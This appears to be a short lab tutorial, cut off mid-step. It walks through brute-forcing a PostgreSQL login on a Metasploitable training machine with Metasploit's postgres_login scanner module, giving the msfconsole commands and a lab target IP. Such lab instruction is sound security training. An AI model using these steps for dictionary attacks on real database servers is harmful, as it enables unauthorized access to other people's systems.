Metasploitable PostgreSQL
In this recipe, we will explore how to use Metasploit to attack a PostgreSQL database server using the PostgreSQL Scanner module. PostgreSQL is touted as being the world's most advanced open source database and by many enthusiasts is said to be an enterprise class database. We will use Metasploit in order to brute force a PostgreSQL login.
Getting ready
The following requirement needs to be fulfilled:
A connection to the internal network
Metasploitable running in our hacking lab
Wordlist to perform dictionary attack
How to do it...
Let's begin our PostgreSQL attack by opening a terminal window:
Open the command prompt.
Launch the MSFCONSOLE:
msfconsoleSearch for all the available PostgreSQL modules:
search postgresql
Use the PostgreSQL Scanner module:
use auxiliary/scanner/postgres/postgres_login
Show the available options of the module:
show optionsSet
RHOSTto the host of your Metasploitable 2 machine or target:set RHOST 192.168.10.111Set your username file location...
